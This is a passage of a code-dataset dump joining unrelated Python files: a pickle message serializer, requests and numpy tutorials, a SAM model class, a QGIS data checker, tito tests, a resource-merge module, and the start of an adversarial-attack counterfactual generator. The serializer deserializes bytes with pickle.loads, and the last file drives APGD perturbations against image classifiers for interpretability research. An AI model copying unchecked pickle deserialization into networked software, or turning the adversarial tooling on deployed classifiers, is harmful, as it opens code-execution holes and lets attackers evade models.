Algorithms/_/wrappedmemo.py","file_name":"wrappedmemo.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27484594579","text":"import pickle\nimport hashlib\n\n\ndef serialize(object):\n return pickle.dumps(object)\n\n\ndef deserialize(object_bytes):\n return pickle.loads(object_bytes)\n\n\n# create md5 hex hash value of byte object\ndef hash_code_hex(data_bytes):\n hash_code = hashlib.md5(data_bytes)\n return hash_code.hexdigest()\n\n\n# serialize the PUT request and pack with its md5\ndef serialize_PUT(object):\n object_bytes = pickle.dumps(object)\n hash_code = hash_code_hex(object_bytes)\n envelope_bytes = pickle.dumps({\n 'operation': 'PUT',\n 'id': hash_code,\n 'payload': object\n })\n return envelope_bytes, hash_code\n\n\n# serialize GET request\ndef serialize_GET(id):\n envelope_bytes = pickle.dumps({\n 'operation': 'GET',\n 'id': id\n })\n return envelope_bytes, id\n\n\n# serialize DELETE request\ndef serialize_DELETE(id):\n envelope_bytes = pickle.dumps({\n 'operation': 'DELETE',\n 'id': id\n })\n return envelope_bytes, id\n\n\ndef test():\n data_bytes, hash_code = serialize_PUT({'user': 'Foo'})\n print(f\"Data Bytes={data_bytes}\\nHash Code={hash_code}\")\n data = deserialize(data_bytes)\n print(data)\n\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"cipopic/LRU-Cache-and-Bloom-Filter","sub_path":"pickle_hash.py","file_name":"pickle_hash.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37624197188","text":"import requests\n\nr = requests.get('https://www.baidu.com/')\nprint(type(r))\nprint(r.status_code)\nprint(type(r.text))\nprint(r.text)\nprint(r.cookies)\n\nr1 = requests.post('http://httpbin.org/post')\nr2 = requests.put('http://httpbin.org/put')\nr3 = requests.delete('http://httpbin.org/delete')\nr4 = requests.head('http://httpbin.org/get')\nr5 = requests.options('http://httpbin.org/get')\n\n\nr6 = requests.get('http://httpbin.org/get')\nprint(r6.text)\n\n\ndata = {\n 'name': 'germey',\n 'age': 22\n}\nr7 = requests.get('http://httpbin.org/get', params=data)\nprint(r7.text) #返回结果为json格式\n\nr8 = requests.get('http://httpbin.org/get')\nprint(type(r8.text))\nprint(r8.json())\nprint(type(r8.json())) #将返回结果是json格式的字符串转化为字典\n\n\nimport re\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko)\\\n Chrome/52.0.2743.116 Safari/537.36'\n}\nr9 = requests.get(\"https://www.zhihu.com/explore\", headers = headers)\npattern = re.compile('explore-feed.*?question_link.*?>(.*?)', re.S)\ntitles = re.findall(pattern, r9.text)\nprint(titles)\n\n\nrA = requests.get('https://github.com/favicon.ico')\n# print(rA.text)\n# print(rA.content)\n\n#wb代表以二进制写的形式打开,可以向文件里写入二进制数据\n#图片、音频、视频文件都可以用这种方法获取\nwith open('favicon.ico', 'wb') as f:\n f.write(rA.content)\n\ndata1 = {'name': 'germey', 'age': '22'}\nrB = requests.post('http://httpbin.org/post', data=data)\nprint(rB.text) #展现在form部分\nprint(rB.status_code, rB.headers, rB.cookies, rB.url, rB.history)\nexit() if not rB.status_code == requests.codes.ok else print('Request Successfully')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"existenceE/into","sub_path":"basistoknowofpython/requeststest.py","file_name":"requeststest.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1803893633","text":"import numpy as np\n\ndef getVector(mag, deg): # 크기와 방향에 대응하는 벡터 생성\n vec = np.zeros(2)\n vec[0] = mag*np.cos(deg*2*np.pi/360)\n vec[1] = mag*np.sin(deg*2*np.pi/360)\n return vec\n\ndef getMagDeg(vec): # 벡터의 크기와 방향 계산 \n mag = np.sqrt(vec[0]*vec[0]+vec[1]*vec[1])\n deg = np.arctan(vec[1]/vec[0]) * 360/(2*np.pi)\n return mag, deg\n\nF1 = getVector(100, 30) # 크기 100N, 방향 인 힘 \nF2 = getVector(120, 60) # 크기 120N, 방향 인 힘 \nFsum = F1 + F2\nmagn, angle = getMagDeg(Fsum)\nprint(\"Magnitude of the summed force : \", magn)\nprint(\"Angle of the summed force : \", angle)\n","repo_name":"KeonMyungLee/applied-linear-algebra","sub_path":"Practice-Code/06장/prog6-1.py","file_name":"prog6-1.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38155601371","text":"from typing import List\n\nimport torch\nfrom torch import nn\n\nfrom .decoders import MaskDecoder\nfrom .encoders import ImageEncoderViT, PromptEncoder\n\n\nclass Sam(nn.Module):\n mask_threshold: float = 0.0\n image_format: str = 'RGB'\n\n def __init__(\n self,\n image_encoder: ImageEncoderViT,\n prompt_encoder: PromptEncoder,\n mask_decoder: MaskDecoder,\n pixel_mean: List[float] = (123.675, 116.28, 103.53),\n pixel_std: List[float] = (58.395, 57.12, 57.375)\n ) -> None:\n \"\"\"\n SAM predicts object masks from an image and input prompts.\n\n Note:\n All forward() operations moved to SAMPredictor.\n\n Args:\n image_encoder (ImageEncoderViT): The backbone used to encode the image into image embeddings that allow for\n efficient mask prediction.\n prompt_encoder (PromptEncoder): Encodes various types of input prompts.\n mask_decoder (MaskDecoder): Predicts masks from the image embeddings and encoded prompts.\n pixel_mean (list(float)): Mean values for normalizing pixels in the input image.\n pixel_std (list(float)): Std values for normalizing pixels in the input image.\n \"\"\"\n super().__init__()\n self.image_encoder = image_encoder\n self.prompt_encoder = prompt_encoder\n self.mask_decoder = mask_decoder\n self.register_buffer('pixel_mean', torch.Tensor(pixel_mean).view(-1, 1, 1), False)\n self.register_buffer('pixel_std', torch.Tensor(pixel_std).view(-1, 1, 1), False)\n","repo_name":"RuningMangoPi/yolov8_QAT","sub_path":"ultralytics/ultralytics/models/sam/modules/sam.py","file_name":"sam.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"3718304695","text":"'''\nCreated on 23 oct. 2015\n\nUpdated on 11 may 2016\n\n@author: arxit\n'''\n\nimport os\n\nimport processing\nfrom processing.tools import *\n\nfrom qgis.core import *\nimport qgis.utils\nfrom PyQt4.QtGui import QAction\nfrom PyQt4.QtCore import QCoreApplication\n\nfrom PagLuxembourg.schema import *\nimport PagLuxembourg.main\n\nfrom error_summary_dialog import ErrorSummaryDialog\n\nclass DataChecker(object):\n '''\n Main class for the data checker widget\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n \n def run(self):\n '''\n Runs the widget\n \n :returns: True if there's no errors\n :rtype: Boolean\n '''\n \n project = PagLuxembourg.main.current_project\n \n if not project.isPagProject():\n return\n \n layer_structure_errors = list()\n data_errors = list()\n \n # 'MODIFICATION PAG' layer definition \n layer_PAG = project.getModificationPagLayer()\n \n # 'MODIFICATION PAG' selection definition\n selection_PAG = layer_PAG.selectedFeatures()\n \n # Counting number entities in 'MODIFICATION PAG' selection\n entity_count_PAG = layer_PAG.selectedFeatureCount()\n \n # Iterates through XSD types\n for type in PagLuxembourg.main.xsd_schema.types:\n layer = project.getLayer(type)\n \n if layer is None:\n continue\n \n warn_errors, fatal_errors = self.checkLayerStructure(layer, type)\n layer_structure_errors = layer_structure_errors + warn_errors + fatal_errors\n \n if len(fatal_errors)>0:\n continue\n \n layer_data_errors = self.checkLayerData(selection_PAG, layer, type)\n data_errors.append(layer_data_errors)\n \n # Flatten data errors\n data_errors_flat = list()\n for layer, errors in data_errors:\n for feature, field, message in errors:\n data_errors_flat.append((layer, feature, field, message))\n \n valid = (len(layer_structure_errors) + len(data_errors_flat)) == 0\n \n # Messages display for number of selected entities\n if valid and entity_count_PAG == 1:\n PagLuxembourg.main.qgis_interface.messageBar().clearWidgets()\n PagLuxembourg.main.qgis_interface.messageBar().pushSuccess(QCoreApplication.translate('DataChecker','Success'),\n QCoreApplication.translate('DataChecker','No errors found on entities that intersect {} selected entity in MODIFICATION PAG layer').format(entity_count_PAG))\n elif valid and entity_count_PAG == 0 :\n PagLuxembourg.main.qgis_interface.messageBar().clearWidgets()\n PagLuxembourg.main.qgis_interface.messageBar().pushSuccess(QCoreApplication.translate('DataChecker_no','Success'),\n QCoreApplication.translate('DataChecker_no','No errors found'))\n elif valid and entity_count_PAG > 1 :\n PagLuxembourg.main.qgis_interface.messageBar().clearWidgets()\n PagLuxembourg.main.qgis_interface.messageBar().pushSuccess(QCoreApplication.translate('DataChecker_many','Success'),\n QCoreApplication.translate('DataChecker_many','No errors found on entities that intersect {} selected entities in MODIFICATION PAG layer').format(entity_count_PAG))\n \n else:\n self.dlg = ErrorSummaryDialog(layer_structure_errors, data_errors)\n self.dlg.show()\n \n return valid \n \n # Datatype mapping allowed while checking. For a given XSD type, several QGIS type may be allowed or compatible\n XSD_QGIS_ALLOWED_DATATYPE_MAP = [(DataType.STRING, 'string'),\n (DataType.STRING, 'integer'),\n (DataType.STRING, 'double'),\n (DataType.INTEGER, 'integer'),\n (DataType.DOUBLE, 'double'),\n (DataType.DOUBLE, 'integer'),\n (DataType.DATE, 'date')]\n \n def checkLayerStructure(self, layer, xsd_type):\n '''\n Checks a layer structure against the XSD type\n Missing field, data type mismatch\n \n :param layer: The vector layer to check\n :type layer: QgsVectorLayer\n \n :param type: XSD schema type\n :type type: PAGType\n \n :returns: A list of warning and fatal error\n :rtype: Tuple : warning, fatal. Layer (QgsVectorLayer), field (PAGField), message (str, QString)\n '''\n \n native_fields = PagLuxembourg.main.current_project.getNativeFields(xsd_type)\n warn_errors = list()\n fatal_errors = list()\n \n # Check geometry type\n if xsd_type.geometry_type is not None and XSD_QGIS_GEOMETRYTYPE_MAP[xsd_type.geometry_type] != layer.geometryType():\n fatal_errors.append((layer, None, QCoreApplication.translate('DataChecker','Geometry type mismatch, expected : {}').format(xsd_type.geometry_type)))\n \n # Check field structure\n for field in xsd_type.fields:\n # Check field missing\n if self._getNativeField(native_fields, field.name) == None:\n if field.nullable:\n warn_errors.append((layer, field, QCoreApplication.translate('DataChecker','Nullable field is missing')))\n else:\n warn_errors.append((layer, field, QCoreApplication.translate('DataChecker','Non nullable field is missing')))\n \n continue\n \n # Check field datatype\n layer_field_name, layer_field_type = self._getNativeField(native_fields, field.name)\n found = False\n for xsd_type, qgis_type in self.XSD_QGIS_ALLOWED_DATATYPE_MAP:\n if layer_field_type == qgis_type and field.type == xsd_type:\n found = True\n break\n \n if not found:\n fatal_errors.append((layer, field, QCoreApplication.translate('DataChecker','Field datatype mismatch, expected : {}').format(field.type)))\n \n return warn_errors, fatal_errors\n \n def _getNativeField(self, fields, name):\n '''\n Get a native field from name\n '''\n for field in fields:\n if field[0]==name:\n return field\n \n return None\n \n def checkLayerData(self, selection_PAG, layer, xsd_type):\n '''\n Checks the data of a layer against the XSD type\n \n :param selection_PAG: Selected features from the Modification PAG layer\n :type selection_PAG: QgsFeatureList\n \n :param layer: The vector layer to check\n :type layer: QgsVectorLayer\n \n :param type: XSD schema type\n :type type: PAGType\n \n :returns: A list of data error\n :rtype: Tuples : Layer (QgsVectorLayer), list of tuple Feature (QgsFeature), field (PAGField), message (str, QString)\n '''\n \n errors = list()\n areas = []\n \n # Check if a selection exists in 'MODIFICATION PAG'\n if len(selection_PAG) > 0 :\n \n # Selection by intersection with 'MODIFICATION PAG' layer\n for PAG_feature in selection_PAG:\n cands = layer.getFeatures()\n for layer_features in cands:\n if PAG_feature.geometry().intersects(layer_features.geometry()):\n areas.append(layer_features.id())\n\n if layer.geometryType()== QGis.NoGeometry:\n layer.selectAll()\n else:\n layer.select(areas)\n selection_entities_from_PAG = layer.selectedFeatures()\n\n for feature in selection_entities_from_PAG :\n errors += self.checkFeatureData(feature, xsd_type)\n \n else:\n \n for feature in layer.dataProvider().getFeatures() :\n errors += self.checkFeatureData(feature, xsd_type)\n \n return layer, errors\n \n def checkFeatureData(self, feature, xsd_type):\n '''\n Checks the data of a feature against the XSD type\n \n :param feature: The feature to check\n :type feature: QgsFeature\n \n :param type: XSD schema type\n :type type: PAGType\n \n :returns: A list of error\n :rtype: List of tuples : Feature (QgsFeature), field (PAGField), message (str, QString)\n '''\n \n errors = list()\n \n # Check geometry\n if xsd_type.geometry_type is not None:\n errors += self.checkFeatureGeometry(feature)\n \n for field in feature.fields():\n xsd_field = xsd_type.getField(field.name())\n \n # Check if field exists in XSD\n if xsd_field is None:\n continue\n \n errors += self.checkFeatureFieldData(feature, xsd_field)\n \n return errors\n \n def checkFeatureFieldData(self, feature, xsd_field):\n '''\n Checks the data of a feature against the XSD type\n \n :param feature: The feature to check\n :type feature: QgsFeature\n \n :param xsd_field: XSD type field\n :type xsd_field: PAGField\n \n :returns: A list of error\n :rtype: List of tuples : Feature (QgsFeature), field (PAGField), message (str, QString)\n '''\n \n errors = list()\n \n field_value = feature.attribute(xsd_field.name)\n \n # Check null value\n if field_value is None or field_value == NULL:\n if not xsd_field.nullable:\n errors.append((feature, xsd_field, QCoreApplication.translate('DataChecker','Null value in non nullable field')))\n \n return errors\n \n # Check numeric values\n if xsd_field.type in [DataType.INTEGER,DataType.DOUBLE]:\n numeric_value = float(field_value)\n \n # Check min value\n if xsd_field.minvalue is not None:\n min_value = float(xsd_field.minvalue)\n if numeric_value < min_value:\n errors.append((feature, xsd_field, QCoreApplication.translate('DataChecker','Value ({}) less than minimum value ({})').format(numeric_value, min_value)))\n \n # Check max value\n if xsd_field.maxvalue is not None:\n max_value = float(xsd_field.maxvalue)\n if numeric_value > max_value:\n errors.append((feature, xsd_field, QCoreApplication.translate('DataChecker','Value ({}) greater than maximum value ({})').format(numeric_value, max_value)))\n \n # Check string values\n if xsd_field.type == DataType.STRING:\n text_value = unicode(field_value)\n \n # Check value length\n if xsd_field.length is not None:\n text_length = len(text_value)\n max_length = int(xsd_field.length)\n if text_length > max_length:\n errors.append((feature, xsd_field, QCoreApplication.translate('DataChecker','Text length ({}) greater than field length ({})').format(text_length, max_length)))\n \n # Check enumeration\n if xsd_field.listofvalues is not None:\n if text_value not in xsd_field.listofvalues:\n errors.append((feature, xsd_field, QCoreApplication.translate('DataChecker','Text ({}) not in field list of values').format(text_value)))\n \n return errors\n \n def checkFeatureGeometry(self, feature):\n '''\n Checks the geometry of a feature\n \n :param feature: The feature to check\n :type feature: QgsFeature\n \n :returns: A list of error\n :rtype: List of tuples : Feature (QgsFeature), field (PAGField), message (str, QString)\n '''\n \n errors = list()\n \n if feature.geometry() is None or feature.geometry().isEmpty():\n errors.append((feature, None, QCoreApplication.translate('DataChecker','Geometry is empty')))\n else:\n errors2 = feature.geometry().validateGeometry()\n \n for error in errors2:\n errors.append((feature, None, error.what()))\n \n return errors","repo_name":"Geoportail-Luxembourg/qgis-pag-plugin","sub_path":"widgets/data_checker/data_checker.py","file_name":"data_checker.py","file_ext":"py","file_size_in_byte":12776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11520076877","text":"import os\nimport shutil\nimport tempfile\nimport unittest\n\nfrom functional.fixture import tito\nfrom glob import glob\nfrom os.path import join\n\n\nclass BuildTitoTests(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n 'Run tito build before _all_ tests in this class.'\n self.output_dir = tempfile.mkdtemp(\"-titotestoutput\")\n os.chdir(os.path.abspath(join(__file__, '..', '..', '..')))\n self.artifacts = tito(\n 'build --rpm --test --output=%s --offline --no-cleanup --debug' %\n self.output_dir\n )\n\n @classmethod\n def tearDownClass(self):\n 'Clean up after _all_ tests in this class unless any test fails.'\n shutil.rmtree(self.output_dir)\n\n def test_build_tito(self):\n 'Tito creates three artifacts'\n self.assertEqual(3, len(self.artifacts))\n\n def test_find_srpm(self):\n 'One artifact is an SRPM'\n srpms = glob(join(self.output_dir, 'tito-*src.rpm'))\n self.assertEqual(1, len(srpms))\n\n def test_find_rpm(self):\n 'One artifact is a noarch RPM'\n rpms = glob(join(self.output_dir, 'noarch', 'tito-*noarch.rpm'))\n self.assertEqual(1, len(rpms))\n\n def test_find_tgz(self):\n 'One artifact is a tarball'\n tgzs = glob(join(self.output_dir, 'tito-*tar.gz'))\n self.assertEqual(1, len(tgzs))\n","repo_name":"rpm-software-management/tito","sub_path":"test/functional/build_tito_tests.py","file_name":"build_tito_tests.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":370,"dataset":"github-code","pt":"47"} +{"seq_id":"44159638331","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nDefine classes and methods for working with resources extracted from blog.\n\nThis module defines the following classes:\n\n * Resource: Extracts and represents key information about a web resource.\n\"\"\"\n\nimport copy\nimport datetime\nimport io\nimport json\nimport logging\nimport pprint\nimport sys\n\nfrom wikidata_suggest import suggest\n\nPROVENANCE_VERBS = {\n 'citesAsMetadataDocument': 'http://purl.org/spar/cito/citesAsMetadataDocument',\n 'citesAsDataSource': 'http://purl.org/spar/cito/citesAsDataSource',\n 'hasWorkflowMotif': 'http://purl.org/net/wf-motifs#hasWorkflowMotif',\n 'Combine': 'http://purl.org/net/wf-motifs#Combine'\n}\n\nclass Resource:\n \"\"\"Store, manipulate, and export data about a single information resource.\"\"\"\n\n def __init__(self):\n \"\"\"Set all attributes to default values.\"\"\"\n\n self.authors = []\n self.contributors = []\n self.description = None\n self.domain = None\n self.editors = []\n self.end_date = None\n self.extent = None\n self.form = None\n self.frequency = None\n self.identifiers = {}\n self.is_part_of = None\n self.issue = None\n self.issuance = None\n self.issued_dates = None\n self.keywords = []\n self.languages = []\n self.places = []\n self.provenance = []\n self.publishers = []\n self.related_resources = []\n self.responsibility = []\n self.start_date = None\n self.subordinate_resources = []\n self.title = None\n self.title_alternates = []\n self.title_extended = None\n self.type = None\n self.url = None\n self.url_alternates = []\n self.volume = None\n self.year = None\n self.zenon_id = None\n self.zotero_id = None\n\n def json_dumps(self, formatted=False):\n \"\"\"Dump resource to JSON as a UTF-8 string.\"\"\"\n\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n dump = self.__dict__.copy()\n for k,v in dump.iteritems():\n logger.debug(\"{0} ({1})\".format(k, type(v)))\n if formatted:\n return json.dumps(dump, indent=4, sort_keys=True, ensure_ascii=False).encode('utf8')\n else:\n return json.dumps(dump, ensure_ascii=False).encode('utf8')\n\n def json_dump(self, filename, formatted=False):\n \"\"\"Dump resource as JSON to a UTF-8 encoded file.\"\"\"\n dumps = self.json_dumps(formatted) # get utf8-encoded JSON dump\n with open(filename, 'w') as f:\n f.write(dumps)\n del dumps\n\n\n def json_loads(self, s):\n \"\"\"Parse resource from a UTF-8 JSON string.\"\"\"\n self.__dict__ = json.loads(unicode(s))\n\n def json_load(self, filename):\n \"\"\"Parse resource from a json file.\"\"\"\n with io.open(filename, 'r', encoding='utf8') as f:\n self.__dict__ = json.load(f)\n\n def package(self):\n \"\"\"Return a summary package of resource information.\"\"\"\n pkg = {}\n try:\n title = self.extended_title\n except AttributeError:\n title = self.title\n pkg['title_full'] = title\n pkg['url'] = self.url\n if title != self.title:\n pkg['title'] = self.title\n return pkg\n\n\n def zotero_add(self, zot, creds, extras={}):\n \"\"\"Upload as a record to Zotero.\"\"\"\n\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n\n try:\n issn = self.identifiers['issn']\n except KeyError:\n if 'journal' in self.keywords:\n zot_type = 'journalArticle'\n else:\n zot_type = 'webpage'\n else:\n zot_type = 'journalArticle'\n template = zot.item_template(zot_type)\n template['abstractNote'] = self.description\n if 'issn' in locals():\n template['issn'] = issn\n template['tags'] = self.keywords\n template['extra'] = ', '.join([':'.join((k,'\"{0}\"'.format(v))) for k,v in extras.iteritems()])\n try:\n template['language'] = self.language[0]\n except TypeError:\n pass\n template['title'] = self.title\n template['url'] = self.url\n resp = zot.create_items([template])\n try:\n zot_id = resp[u'success'][u'0']\n logger.debug(\"zot_id: {0}\".format(zot_id))\n except KeyError:\n logger.error('Zotero upload appears to have failed with {0}'.format(repr(resp)))\n raise\n else:\n self.zotero_id = {\n 'libraryType': creds['libraryType'],\n 'libraryID': creds['libraryID'],\n 'itemID': zot_id\n }\n logger.debug(repr(self.zotero_id))\n\n def wikidata_suggest(self, resource_title):\n wikidata = suggest(resource_title)\n if wikidata:\n return wikidata['id']\n else:\n return None\n\n def set_provenance(self, object, verb='citesAsMetadataDocument', object_date=None, fields=None):\n \"\"\"Add an entry to the provenance list.\"\"\"\n\n d = {\n 'term': PROVENANCE_VERBS[verb],\n 'when': datetime.datetime.utcnow().isoformat(),\n 'resource': object\n }\n if object_date is not None:\n d['resource_date'] = object_date\n if fields is not None:\n if fields is list:\n d['fields'] = fields\n else:\n d['fields'] = list(fields)\n self.provenance.append(d)\n\n def __str__(self):\n return pprint.pformat(self.__dict__, indent=4, width=120)\n\n\ndef merge(r1, r2):\n \"\"\"Merge two resources into oneness.\"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n r3 = Resource()\n modified_fields = []\n k1 = r1.__dict__.keys()\n k2 = r2.__dict__.keys()\n all_keys = list(set(k1 + k2))\n domain = r1.domain\n for k in all_keys:\n modified = False\n v3 = None\n try:\n v1 = copy.deepcopy(r1.__dict__[k])\n except KeyError:\n v1 = None\n try:\n v2 = copy.deepcopy(r2.__dict__[k])\n except KeyError:\n v2 = None\n\n if k in ['url',]:\n if v1 != v2:\n if v1.startswith(v2):\n v3 = v2\n r3.__dict__['url_alternates'].append(v1)\n elif v2.startswith(v1):\n v3 = v1\n r3.__dict__['url_alternates'].append(v2)\n else:\n protocol1, path1 = v1.split('://')\n protocol2, path2 = v2.split('://')\n if path1 == path2 and (protocol1 == 'https' or protocol2 == 'https'):\n v3 = 'https://' + path1\n else:\n raise ValueError(u'could not reconcile url mismatch in merge: {1} vs. {2}'.format(k, v1, v2))\n else:\n v3 = v1\n else:\n modified = True\n if v1 is None and v2 is None:\n v3 = None\n modified = False\n # prefer some data over no data\n elif v1 is None and v2 is not None:\n v3 = v2\n elif v1 is not None and v2 is None:\n v3 = v1\n elif k == 'is_part_of':\n if v1 == v2:\n v3 = v1\n modified = False\n else:\n if domain in v1['url']:\n v3 = v1\n elif domain in v2['url']:\n v3 = v2\n elif 'issn' in v1.keys() and not('issn' in v2.keys()):\n v3 = v1\n elif 'issn' in v2.keys() and not('issn' in v1.keys()):\n v3 = v2\n else:\n v3 = None\n elif k in ['volume', 'year', 'zenon_id', 'issue', 'zotero_id']:\n if v1 == v2:\n v3 = v1\n modified = False\n elif v1 is None and v1 is not None:\n v3 = v2\n elif v1 is not None and v2 is None:\n v3 = v1\n else:\n raise ValueError(u'cannot merge two resources in which the {0} field differs: \"{1}\" vs. \"{2}\"'.format(k, v1, v2))\n elif k == 'languages':\n if len(v1) == 0 and len(v2) > 0:\n v3 = copy.deepcopy(v2)\n elif len(v1) > 0 and len(v2) == 0:\n v3 = copy.deepcopy(v1)\n elif len(v1) > 0 and len(v2) > 0:\n v3 = list(set(v1 + v2))\n else:\n v3 = []\n elif k == 'identifiers':\n if len(v1) == 0 and len(v2) > 0:\n v3 = copy.deepcopy(v2)\n elif len(v1) > 0 and len(v2) == 0:\n v3 = copy.deepcopy(v1)\n elif len(v1) > 0 and len(v2) > 0:\n v3 = {}\n idfams = list(set(v1.keys() + v2.keys()))\n for idfam in idfams:\n thisval1 = None\n thisval2 = None\n try:\n thisval1 = v1[idfam]\n except KeyError:\n pass\n try:\n thisval2 = v2[idfam]\n except KeyError:\n pass\n if type(thisval1) == list or type(thisval2) == list:\n v3[idfam] = []\n if thisval1 is not None:\n v3[idfam].extend(thisval1)\n if thisval2 is not None:\n v3[idfam].extend(thisval2)\n v3[idfam] = list(set(v3[idfam]))\n elif type(thisval1) == dict or type(thisval2) == dict:\n if thisval1 is None and thisval2 is not None:\n v3 = copy.deepcopy(v2)\n elif thisval1 is not None and thisval2 is None:\n v3 = copy.deepcopy(v1)\n else:\n v3[idfam] = {}\n idtypes = list(set(thisval1.keys() + thisval2.keys()))\n for idtype in idtypes:\n thissubval1 = None\n thissubval2 = None\n try:\n thissubval1 = v1[idfam][idtype]\n except KeyError:\n pass\n try:\n thissubval2 = v2[idfam][idtype]\n except KeyError:\n pass\n v3[idfam][idtype] = []\n if thissubval1 is not None:\n v3[idfam][idtype].extend(thissubval1)\n if thissubval2 is not None:\n v3[idfam][idtype].extend(thissubval2)\n v3[idfam][idtype] = list(set(v3[idfam][idtype]))\n else:\n v3 = {}\n\n elif k in ['subordinate_resources', 'related_resources']:\n if len(v1) == 0 and len(v2) == 0:\n modified = False\n v3 = v1 + v2\n seen = []\n for v3_child in v3:\n if v3_child['url'] in seen:\n del(v3_child)\n else:\n seen.append(v3_child['url'])\n del(seen)\n elif k == 'provenance':\n modified = False\n v3 = v1 + v2\n elif type(v1) == list and type(v2) == list:\n if len(v1) == 0 and len(v2) == 0:\n modified = False\n v3 = []\n elif len(v1) == 0 and len(v2) > 0:\n v3 = v2\n elif len(v1) > 0 and len(v2) == 0:\n v3 = v1\n else:\n v3 = list(set(v1 + v2))\n elif type(v1) in [unicode, str]:\n if len(v1) == 0 and len(v2) == 0:\n modified = False\n v3 = v1\n elif v1 == v2:\n modified = False\n v3 = v1\n # if one contains the other, prefer the container\n elif v1 in v2:\n v3 = v2\n elif v2 in v1:\n v3 = v1\n # prefer the longer of the two\n elif len(v1) > len(v2):\n v3 = v1\n else:\n v3 = v2\n else:\n raise Exception\n r3.__dict__[k] = v3\n if modified:\n modified_fields.append(k)\n r3.set_provenance('http://purl.org/net/wf-motifs#Combine', 'hasWorkflowMotif', fields=modified_fields)\n return r3\n\n\ndef scriptinfo():\n '''\n Returns a dictionary with information about the running top level Python\n script:\n ---------------------------------------------------------------------------\n dir: directory containing script or compiled executable\n name: name of script or executable\n source: name of source code file\n ---------------------------------------------------------------------------\n \"name\" and \"source\" are identical if and only if running interpreted code.\n When running code compiled by py2exe or cx_freeze, \"source\" contains\n the name of the originating Python script.\n If compiled by PyInstaller, \"source\" contains no meaningful information.\n '''\n\n import os, sys, inspect\n #---------------------------------------------------------------------------\n # scan through call stack for caller information\n #---------------------------------------------------------------------------\n for teil in inspect.stack():\n # skip system calls\n if teil[1].startswith(\"<\"):\n continue\n if teil[1].upper().startswith(sys.exec_prefix.upper()):\n continue\n trc = teil[1]\n\n # trc contains highest level calling script name\n # check if we have been compiled\n if getattr(sys, 'frozen', False):\n scriptdir, scriptname = os.path.split(sys.executable)\n return {\"dir\": scriptdir,\n \"name\": scriptname,\n \"source\": trc}\n\n # from here on, we are in the interpreted case\n scriptdir, trc = os.path.split(trc)\n # if trc did not contain directory information,\n # the current working directory is what we need\n if not scriptdir:\n scriptdir = os.getcwd()\n\n scr_dict ={\"name\": trc,\n \"source\": trc,\n \"dir\": scriptdir}\n return scr_dict\n\n","repo_name":"DigiClass/COACS","sub_path":"awol_python3/isaw/awol/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":15102,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"43597331577","text":"\"\"\"\nBased on https://github.com/valentyn1boreiko/SVCEs_code by Valentyn Boreiko.\n\"\"\"\nimport sys\nsys.path.append('../')\n\nimport os\nimport torch\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom neural_pca.adversarial_attacks.act_apgd import ActivationAPGDAttack\nimport neural_pca.data\n\ndef generate_feature_counterfactuals(\n model,\n images,\n last_layer,\n eigenvectors,\n target_cls,\n norm,\n eps,\n steps,\n perturbation_targets,\n device,\n seed,\n n_restarts=1,\n x_init=None,\n reg_other=1.0,\n result_path=None,\n return_losses=False,\n loss='obj',\n ica_components=None,\n ica_mean=None,\n minimize=False,\n minimize_abs=False):\n \"\"\"\n Args:\n model: Pytorch model, This model is used to generate the counterfactuals.\n images: torch.Tensor, N x C x H x W, Original images\n last_layer: torch.nn.module last layer of the model\n eigenvectors: corresponding to principal componentg in weighted last layer activation space\n target_cls: determines which weights are used for the weighted activations\n n_classes: int, number of classes in the dataset\n norm: str in [\"L2\", \"L1\", \"Linf\"], norm used for the adversarial attacks\n eps: float, epsilon used for the adversarial attacks\n steps: int, number of steps used for the adversarial attacks\n pgd: str, default \"apgd\", optimization procedure used for the adversarial attacks\n perturbation_targets: torch.Tensor(dtype=torch.long), N x N_targets, contains N_targets\n perturbation targets (indices of principal components of weighted last layer activations) \n for each image in images\n device: torch.device, CUDA device used for the generation\n seed: integer, random seed\n momentum: float, momentum used for the adversarial attacks\n stepsize: float, stepsize used for the adversarial attacks\n n_restarts: integer, number of restarts used in the adversarial attack (right now only supported for AFW and APGDs)\n x_init: torch.Tensor, N x C x H x W, Initialization for the adversarial perturbation. If 'None', the perturbations are initialized randomly.\n normalize_gradient: bool, flag that determines whether gradients are normalized\n result_path: str, Path for saving the counterfactuals. If 'None', the counterfactuals are returned instead.\n return_confidences: bool, If True, the confidence and loss values are returned as well (only for APGD)\n \"\"\"\n assert loss in ['obj', 'obj_full', 'ce', 'ce_abs', 'log_nll', 'soft_log_nll', 'min_other', 'min_other_eig', 'max_comp_conf']\n \n bs = images.shape[0]\n if perturbation_targets.shape[0] > bs:\n perturbation_targets = perturbation_targets[:bs]\n \n with torch.no_grad():\n model.to(device)\n images = images.to(device)\n perturbation_targets = perturbation_targets.to(device)\n\n if result_path is not None:\n torch.save(images, result_path + \"/original_images.pt\")\n \n adv_attack = 